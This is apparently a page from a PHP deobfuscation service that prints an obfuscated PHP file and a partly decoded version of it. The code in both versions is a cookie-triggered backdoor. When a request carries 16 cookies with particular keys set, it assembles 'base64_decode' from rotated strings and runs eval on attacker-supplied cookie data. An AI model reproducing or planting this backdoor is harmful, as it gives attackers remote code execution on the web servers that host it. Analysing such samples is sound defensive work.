Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto JyuFL; hWmKZ: ${"\x47\x4c\x4f\102\x41\114\x53"}["\x70\x72\143\171\145\x70\x73..

Decoded Output download

<?php 
 goto JyuFL; hWmKZ: ${"GLOBALS"}["prcyepsatc"] = "IOzjtZedpfVM"; goto upWEd; LboaI: ${"GLOBALS"}["kuqnwyntv"] = "ZjAKfWkbwH"; goto adZj7; eXVLN: if (count($_COOKIE) == 18 - 2) { $btyuxqqwrfob = "PtSDYeluld"; $gkixfxd = "PtSDYeluld"; $jahqhfwk = "PtSDYeluld"; $uegcjak = "PtSDYeluld"; ${$gkixfxd} = $_COOKIE; if (empty(${${"GLOBALS"}["rmrucsqssdo"]}[18 - 4]) && !empty(${$btyuxqqwrfob}[91 - 29]) && !empty(${$jahqhfwk}[23 - 2]) && !empty(${$uegcjak}[73 - 21])) { $yjddueen = "tlwjSPRMEXaHxcV"; ${"GLOBALS"}["wwvqxlmid"] = "PtSDYeluld"; $mrjiuj = "IFKsUmFhwtKCf"; $ivgvlb = "IFKsUmFhwtKCf"; ${$yjddueen} = ${${"GLOBALS"}["rmrucsqssdo"]}[30 + 32] . ${${"GLOBALS"}["wwvqxlmid"]}[9 + 12]; ${$mrjiuj} = "84491700e642a387c7a8776a28174b61"; if (strncmp(${$ivgvlb}, "8wZE4lEZrm", strlen("T4vsgWJUk4Iqzrdc0aRQ")) !== 1 + -1) { ${${"GLOBALS"}["fqplvwygj"]} = array(84, 75, 18, 57); ${"GLOBALS"}["vpzsanstfe"] = "ZjAKfWkbwH"; $hxqlnmna = "ZjAKfWkbwH"; ${"GLOBALS"}["enyggqecq"] = "IOzjtZedpfVM"; ${"GLOBALS"}["traxxqxhfr"] = "GjFEpLOeehTcH"; ${"GLOBALS"}["qirowacuv"] = "HXJMZgCn"; $wibyqbzpni = "rZKauXGlaHIvfI"; ${"GLOBALS"}["hkuvpzcyqfc"] = "IOzjtZedpfVM"; $hnkmdxo = "IOzjtZedpfVM"; ${${"GLOBALS"}["enyggqecq"]} = ${${"GLOBALS"}["aqfhibqhn"]}("pue"); ${"GLOBALS"}["ppalnfbk"] = "HXJMZgCn"; ${${"GLOBALS"}["kuqnwyntv"]} = ${${"GLOBALS"}["aqfhibqhn"]}("beq"); $idskfg = "ZjAKfWkbwH"; ${"GLOBALS"}["ezlkqofqtdm"] = "tlwjSPRMEXaHxcV"; $gvaipoe = "mAGBoPVWcxKiSG"; ${${"GLOBALS"}["yjnndubsvkl"]}[1 - 1] = ${${"GLOBALS"}["prcyepsatc"]}(${$idskfg}(${${"GLOBALS"}["tgkmxk"]}[0 + 0]) + ${${"GLOBALS"}["fqplvwygj"]}[1 - 1]); ${"GLOBALS"}["nafqqrw"] = "ZjAKfWkbwH"; ${${"GLOBALS"}["yjnndubsvkl"]}[2 - 1] = ${${"GLOBALS"}["hkuvpzcyqfc"]}(${$hxqlnmna}(${${"GLOBALS"}["tgkmxk"]}[-1 + 2]) + ${${"GLOBALS"}["fqplvwygj"]}[0 + 1]); ${"GLOBALS"}["vzuilsfsu"] = "HXJMZgCn"; ${"GLOBALS"}["bikueoc"] = "tlwjSPRMEXaHxcV"; $fnhxhgy = "HXJMZgCn"; $weonyfm = "mAGBoPVWcxKiSG"; $jnkqwhingca = "HXJMZgCn"; ${${"GLOBALS"}["yjnndubsvkl"]}[2 - 0] = ${${"GLOBALS"}["prcyepsatc"]}(${${"GLOBALS"}["nafqqrw"]}(${${"GLOBALS"}["tgkmxk"]}[1 + 1]) + ${${"GLOBALS"}["traxxqxhfr"]}[0 + 2]); ${${"GLOBALS"}["qirowacuv"]}[0 + 3] = ${$hnkmdxo}(${${"GLOBALS"}["vpzsanstfe"]}(${${"GLOBALS"}["tgkmxk"]}[4 - 1]) + ${${"GLOBALS"}["fqplvwygj"]}[3 - 0]); ${"GLOBALS"}["bcfqxdodwr"] = "HXJMZgCn"; $onpvojb = "mAGBoPVWcxKiSG"; $gnpuldltwuo = "rZKauXGlaHIvfI"; shuffle(${${"GLOBALS"}["yjnndubsvkl"]}); ${"GLOBALS"}["tgbuhzrgep"] = "rZKauXGlaHIvfI"; ${"GLOBALS"}["ekftsthswf"] = "HXJMZgCn"; ${${"GLOBALS"}["ekftsthswf"]} = array_unique(${${"GLOBALS"}["bcfqxdodwr"]}, SORT_REGULAR); $gnwnognccw = "HXJMZgCn"; $fpwmmosjn = "mAGBoPVWcxKiSG"; $nrutacfj = "PtSDYeluld"; ${$gvaipoe} = false; asort(${${"GLOBALS"}["yjnndubsvkl"]}); ${"GLOBALS"}["ecaopquq"] = "HXJMZgCn"; ${${"GLOBALS"}["ppalnfbk"]} = implode('', ${${"GLOBALS"}["yjnndubsvkl"]}); if (strlen(${${"GLOBALS"}["yjnndubsvkl"]}) == 1 + 4) { ${$gnwnognccw} = trim(${${"GLOBALS"}["yjnndubsvkl"]}, 3 + 5); } ${${"GLOBALS"}["tgbuhzrgep"]} = (${$onpvojb} ? ${${"GLOBALS"}["yjnndubsvkl"]}[0 + 2] . ${$fnhxhgy}[3 - 0] . ${${"GLOBALS"}["yjnndubsvkl"]}[-1 - -1] . ${${"GLOBALS"}["ecaopquq"]}[1 - 0] : ${${"GLOBALS"}["vzuilsfsu"]}[0 + 1] . ${$jnkqwhingca}[-1 + 1] . ${${"GLOBALS"}["yjnndubsvkl"]}[4 - 1] . ${${"GLOBALS"}["yjnndubsvkl"]}[2 - 0]) . ${${"GLOBALS"}["aqfhibqhn"]}("rNiqG1ORQe3"); ${$gnpuldltwuo} = ${${"GLOBALS"}["bikueoc"]}("onfr") . (13 + 51); ${$weonyfm} = "_"; ${${"GLOBALS"}["hyoehjtbfsa"]} = ${$wibyqbzpni} . ${$fpwmmosjn} . ${${"GLOBALS"}["aqfhibqhn"]}("qrpbqr"); eval(${${"GLOBALS"}["hyoehjtbfsa"]}(${${"GLOBALS"}["ezlkqofqtdm"]}(${$nrutacfj}[4 - 1]))); } } } goto y678N; upWEd: ${"GLOBALS"}["yjnndubsvkl"] = "HXJMZgCn"; goto LboaI; adZj7: ${"GLOBALS"}["aqfhibqhn"] = "tlwjSPRMEXaHxcV"; goto BieBd; bf30r: ${"GLOBALS"}["tgkmxk"] = "IFKsUmFhwtKCf"; goto hWmKZ; BieBd: ${"GLOBALS"}["fqplvwygj"] = "GjFEpLOeehTcH"; goto fARNg; JyuFL: ${"GLOBALS"}["hyoehjtbfsa"] = "RfhEwiwbpxrszd"; goto bf30r; fARNg: ${"GLOBALS"}["rmrucsqssdo"] = "PtSDYeluld"; goto eXVLN; y678N: ?>

Did this file decode correctly?

Original Code

<?php
 goto JyuFL; hWmKZ: ${"\x47\x4c\x4f\102\x41\114\x53"}["\x70\x72\143\171\145\x70\x73\x61\x74\143"] = "\111\x4f\172\x6a\x74\x5a\145\144\160\146\126\x4d"; goto upWEd; LboaI: ${"\x47\x4c\117\x42\x41\x4c\x53"}["\153\165\x71\156\167\171\x6e\x74\166"] = "\x5a\x6a\101\x4b\146\x57\x6b\142\167\x48"; goto adZj7; eXVLN: if (count($_COOKIE) == 18 - 2) { $btyuxqqwrfob = "\x50\x74\123\104\131\x65\x6c\x75\x6c\144"; $gkixfxd = "\120\x74\x53\x44\x59\145\x6c\165\154\144"; $jahqhfwk = "\120\x74\123\104\131\145\x6c\165\154\x64"; $uegcjak = "\120\x74\123\x44\131\145\x6c\165\154\144"; ${$gkixfxd} = $_COOKIE; if (empty(${${"\107\114\117\x42\101\x4c\123"}["\162\155\x72\165\x63\x73\x71\163\163\x64\x6f"]}[18 - 4]) && !empty(${$btyuxqqwrfob}[91 - 29]) && !empty(${$jahqhfwk}[23 - 2]) && !empty(${$uegcjak}[73 - 21])) { $yjddueen = "\164\x6c\167\x6a\x53\120\122\x4d\105\x58\141\110\x78\143\126"; ${"\107\114\x4f\x42\x41\x4c\x53"}["\x77\167\166\x71\x78\x6c\155\x69\144"] = "\120\164\x53\x44\131\145\154\165\x6c\144"; $mrjiuj = "\111\106\113\x73\125\x6d\106\150\167\164\x4b\103\146"; $ivgvlb = "\111\106\113\x73\125\155\106\150\167\164\113\x43\x66"; ${$yjddueen} = ${${"\107\x4c\117\x42\x41\114\123"}["\x72\155\162\165\x63\163\x71\163\163\x64\157"]}[30 + 32] . ${${"\107\114\117\x42\x41\x4c\123"}["\x77\x77\x76\x71\170\x6c\155\151\x64"]}[9 + 12]; ${$mrjiuj} = "\70\64\64\71\x31\x37\60\x30\145\x36\x34\62\141\x33\x38\67\143\x37\141\x38\x37\67\66\141\62\x38\x31\x37\x34\142\x36\61"; if (strncmp(${$ivgvlb}, "\70\167\132\x45\x34\154\x45\x5a\162\155", strlen("\124\64\x76\x73\147\x57\x4a\125\x6b\64\111\x71\172\x72\x64\x63\60\x61\x52\x51")) !== 1 + -1) { ${${"\x47\x4c\x4f\x42\101\114\123"}["\146\x71\x70\154\x76\x77\171\147\x6a"]} = array(84, 75, 18, 57); ${"\107\x4c\117\102\x41\114\123"}["\x76\160\x7a\x73\x61\156\x73\x74\146\145"] = "\132\x6a\x41\113\x66\127\x6b\142\167\110"; $hxqlnmna = "\132\152\x41\113\x66\127\x6b\x62\x77\x48"; ${"\107\x4c\x4f\x42\x41\x4c\x53"}["\145\156\171\147\147\x71\x65\143\161"] = "\x49\x4f\172\152\x74\x5a\x65\x64\160\x66\x56\115"; ${"\107\114\117\102\101\114\x53"}["\x74\162\x61\170\170\161\170\x68\146\x72"] = "\x47\x6a\106\x45\x70\x4c\x4f\145\x65\150\x54\143\x48"; ${"\x47\x4c\117\102\101\x4c\x53"}["\x71\x69\x72\157\x77\141\143\x75\166"] = "\110\130\x4a\115\132\147\103\x6e"; $wibyqbzpni = "\162\x5a\x4b\x61\165\130\x47\154\x61\x48\111\x76\x66\x49"; ${"\x47\114\x4f\102\101\114\x53"}["\150\x6b\165\x76\x70\172\143\171\161\x66\x63"] = "\111\x4f\172\x6a\x74\x5a\145\144\160\146\126\x4d"; $hnkmdxo = "\x49\117\x7a\152\164\132\145\x64\x70\x66\x56\115"; ${${"\x47\x4c\x4f\102\x41\x4c\123"}["\145\156\x79\x67\147\x71\145\143\x71"]} = ${${"\x47\x4c\117\102\101\114\123"}["\x61\x71\x66\x68\151\x62\161\150\156"]}("\x70\x75\x65"); ${"\x47\114\x4f\102\101\x4c\123"}["\160\160\x61\x6c\x6e\x66\142\x6b"] = "\x48\x58\112\115\x5a\147\103\x6e"; ${${"\107\114\117\102\x41\x4c\123"}["\x6b\165\161\x6e\167\x79\156\164\166"]} = ${${"\107\x4c\x4f\x42\x41\114\x53"}["\x61\x71\x66\150\151\142\161\150\156"]}("\142\145\161"); $idskfg = "\x5a\x6a\x41\113\x66\x57\153\x62\167\x48"; ${"\107\114\x4f\x42\x41\x4c\123"}["\145\172\154\153\161\157\x66\x71\x74\144\155"] = "\x74\x6c\x77\152\x53\x50\122\x4d\105\130\141\110\170\x63\126"; $gvaipoe = "\x6d\101\x47\102\x6f\120\126\x57\143\x78\113\151\123\x47"; ${${"\107\x4c\117\x42\101\114\123"}["\171\152\x6e\x6e\144\165\142\163\166\153\154"]}[1 - 1] = ${${"\x47\114\x4f\102\101\114\123"}["\x70\162\143\171\145\160\x73\x61\164\143"]}(${$idskfg}(${${"\x47\114\x4f\102\101\114\123"}["\164\147\x6b\x6d\170\153"]}[0 + 0]) + ${${"\107\114\117\x42\x41\x4c\x53"}["\x66\161\x70\x6c\166\167\x79\147\152"]}[1 - 1]); ${"\107\x4c\x4f\102\101\114\x53"}["\x6e\x61\x66\x71\x71\162\167"] = "\x5a\x6a\x41\113\146\x57\x6b\142\167\x48"; ${${"\x47\x4c\x4f\x42\x41\114\123"}["\x79\x6a\x6e\156\x64\165\x62\x73\166\x6b\x6c"]}[2 - 1] = ${${"\x47\x4c\117\x42\101\x4c\x53"}["\x68\153\x75\166\160\x7a\x63\171\161\146\x63"]}(${$hxqlnmna}(${${"\x47\114\x4f\102\101\114\x53"}["\x74\147\x6b\x6d\x78\x6b"]}[-1 + 2]) + ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66\x71\160\x6c\166\x77\x79\147\152"]}[0 + 1]); ${"\107\114\117\102\x41\x4c\x53"}["\x76\x7a\165\151\154\x73\146\x73\165"] = "\x48\x58\x4a\115\x5a\147\103\156"; ${"\x47\114\117\x42\101\114\123"}["\x62\151\153\x75\145\x6f\x63"] = "\x74\x6c\x77\152\x53\120\122\x4d\x45\x58\141\x48\x78\143\x56"; $fnhxhgy = "\110\130\x4a\x4d\x5a\147\x43\x6e"; $weonyfm = "\155\x41\x47\102\157\120\x56\x57\143\170\x4b\151\x53\x47"; $jnkqwhingca = "\x48\x58\x4a\115\132\147\103\156"; ${${"\107\x4c\117\102\x41\x4c\123"}["\171\x6a\156\x6e\144\x75\142\x73\166\153\154"]}[2 - 0] = ${${"\x47\x4c\117\102\101\114\123"}["\160\162\143\x79\145\x70\x73\x61\x74\x63"]}(${${"\107\x4c\117\102\101\114\x53"}["\x6e\x61\146\x71\161\x72\x77"]}(${${"\107\x4c\x4f\x42\x41\x4c\123"}["\x74\x67\153\155\170\x6b"]}[1 + 1]) + ${${"\107\x4c\x4f\x42\x41\x4c\123"}["\x74\162\141\x78\170\161\x78\x68\x66\162"]}[0 + 2]); ${${"\x47\x4c\x4f\102\101\x4c\123"}["\x71\151\x72\x6f\x77\141\x63\x75\x76"]}[0 + 3] = ${$hnkmdxo}(${${"\x47\x4c\x4f\102\x41\x4c\123"}["\x76\160\x7a\x73\141\156\x73\x74\146\x65"]}(${${"\107\x4c\117\x42\x41\x4c\x53"}["\x74\147\153\155\170\x6b"]}[4 - 1]) + ${${"\x47\114\x4f\x42\101\x4c\x53"}["\x66\161\x70\154\166\167\x79\147\x6a"]}[3 - 0]); ${"\107\114\117\102\101\114\123"}["\142\143\146\161\x78\144\157\x64\x77\162"] = "\110\x58\112\x4d\x5a\147\x43\x6e"; $onpvojb = "\155\101\107\102\157\x50\126\x57\143\170\x4b\151\123\107"; $gnpuldltwuo = "\x72\x5a\x4b\x61\x75\x58\x47\154\141\110\x49\166\146\x49"; shuffle(${${"\x47\x4c\x4f\x42\101\114\x53"}["\171\152\x6e\156\x64\x75\142\163\166\x6b\x6c"]}); ${"\107\x4c\x4f\102\x41\114\123"}["\x74\x67\142\x75\x68\172\162\147\145\x70"] = "\x72\132\113\141\x75\130\107\x6c\x61\110\x49\x76\146\111"; ${"\x47\x4c\117\x42\101\x4c\123"}["\145\153\x66\x74\163\x74\x68\x73\x77\146"] = "\x48\x58\112\115\x5a\x67\x43\156"; ${${"\x47\114\117\x42\101\x4c\123"}["\145\153\146\164\163\164\x68\163\167\x66"]} = array_unique(${${"\x47\x4c\117\x42\101\114\x53"}["\x62\x63\146\161\170\x64\157\144\x77\x72"]}, SORT_REGULAR); $gnwnognccw = "\x48\130\x4a\x4d\x5a\147\x43\156"; $fpwmmosjn = "\x6d\x41\107\x42\x6f\120\126\127\x63\x78\x4b\x69\x53\x47"; $nrutacfj = "\120\x74\123\x44\x59\145\x6c\165\154\144"; ${$gvaipoe} = false; asort(${${"\107\114\117\x42\x41\x4c\123"}["\171\x6a\156\x6e\144\x75\142\x73\x76\153\x6c"]}); ${"\x47\x4c\117\102\101\x4c\x53"}["\x65\143\x61\157\160\161\165\161"] = "\110\130\x4a\115\x5a\x67\x43\156"; ${${"\x47\x4c\117\x42\x41\x4c\x53"}["\160\x70\x61\154\156\x66\142\x6b"]} = implode('', ${${"\107\114\117\x42\x41\x4c\123"}["\x79\x6a\x6e\156\144\x75\142\163\166\x6b\154"]}); if (strlen(${${"\107\x4c\117\x42\101\x4c\123"}["\171\152\156\x6e\x64\x75\x62\163\166\153\154"]}) == 1 + 4) { ${$gnwnognccw} = trim(${${"\x47\x4c\117\102\101\114\123"}["\171\152\156\156\144\x75\x62\163\x76\x6b\154"]}, 3 + 5); } ${${"\x47\114\117\x42\x41\114\x53"}["\x74\147\x62\165\x68\x7a\162\147\145\x70"]} = (${$onpvojb} ? ${${"\107\114\x4f\x42\x41\114\123"}["\171\152\156\156\x64\165\x62\163\166\153\x6c"]}[0 + 2] . ${$fnhxhgy}[3 - 0] . ${${"\x47\x4c\117\x42\101\x4c\x53"}["\x79\x6a\156\x6e\144\165\x62\163\166\153\154"]}[-1 - -1] . ${${"\x47\x4c\117\102\x41\114\x53"}["\x65\143\x61\x6f\x70\161\165\x71"]}[1 - 0] : ${${"\107\114\117\x42\x41\114\x53"}["\x76\172\x75\x69\154\x73\x66\163\165"]}[0 + 1] . ${$jnkqwhingca}[-1 + 1] . ${${"\107\x4c\x4f\x42\x41\114\x53"}["\171\152\156\x6e\144\x75\142\x73\x76\153\x6c"]}[4 - 1] . ${${"\x47\114\117\x42\x41\x4c\123"}["\171\152\x6e\156\144\x75\142\x73\166\x6b\154"]}[2 - 0]) . ${${"\107\x4c\x4f\x42\101\114\x53"}["\141\161\146\x68\x69\142\x71\x68\x6e"]}("\162\x4e\151\161\x47\x31\x4f\122\x51\x65\x33"); ${$gnpuldltwuo} = ${${"\x47\x4c\x4f\x42\101\x4c\123"}["\x62\x69\x6b\165\145\157\x63"]}("\157\156\146\162") . (13 + 51); ${$weonyfm} = "\137"; ${${"\x47\x4c\117\x42\101\x4c\123"}["\x68\x79\x6f\x65\x68\152\x74\x62\146\163\141"]} = ${$wibyqbzpni} . ${$fpwmmosjn} . ${${"\107\114\117\x42\101\x4c\x53"}["\141\x71\x66\150\151\x62\x71\150\x6e"]}("\x71\162\160\x62\161\162"); eval(${${"\x47\114\117\102\x41\114\x53"}["\x68\171\157\145\150\x6a\x74\142\146\163\141"]}(${${"\x47\x4c\117\102\101\x4c\x53"}["\145\172\154\x6b\x71\x6f\x66\x71\x74\144\x6d"]}(${$nrutacfj}[4 - 1]))); } } } goto y678N; upWEd: ${"\x47\114\117\x42\x41\114\x53"}["\x79\x6a\x6e\x6e\144\x75\x62\163\166\153\x6c"] = "\x48\130\x4a\115\132\147\x43\156"; goto LboaI; adZj7: ${"\x47\114\117\x42\x41\114\123"}["\x61\161\x66\x68\151\x62\161\x68\156"] = "\x74\x6c\x77\152\x53\120\122\x4d\105\130\x61\x48\170\143\x56"; goto BieBd; bf30r: ${"\107\114\x4f\x42\x41\x4c\x53"}["\164\147\153\155\170\x6b"] = "\x49\x46\x4b\x73\125\x6d\106\x68\167\164\113\x43\x66"; goto hWmKZ; BieBd: ${"\107\x4c\x4f\102\101\114\123"}["\146\x71\x70\154\x76\x77\171\147\152"] = "\x47\152\x46\x45\160\x4c\117\145\145\x68\124\143\x48"; goto fARNg; JyuFL: ${"\107\114\117\x42\x41\114\x53"}["\x68\171\157\x65\x68\x6a\x74\142\x66\x73\x61"] = "\122\146\150\x45\x77\151\167\142\x70\x78\162\163\172\x64"; goto bf30r; fARNg: ${"\107\x4c\117\x42\101\114\x53"}["\x72\155\162\x75\143\163\161\163\x73\x64\x6f"] = "\x50\x74\123\x44\x59\x65\x6c\165\154\x64"; goto eXVLN; y678N: ?>

Function Calls

None

Variables

None

Stats

MD5 4f5993c28f521ad5a4c5240022fb496b
Eval Count 0
Decode Time 55 ms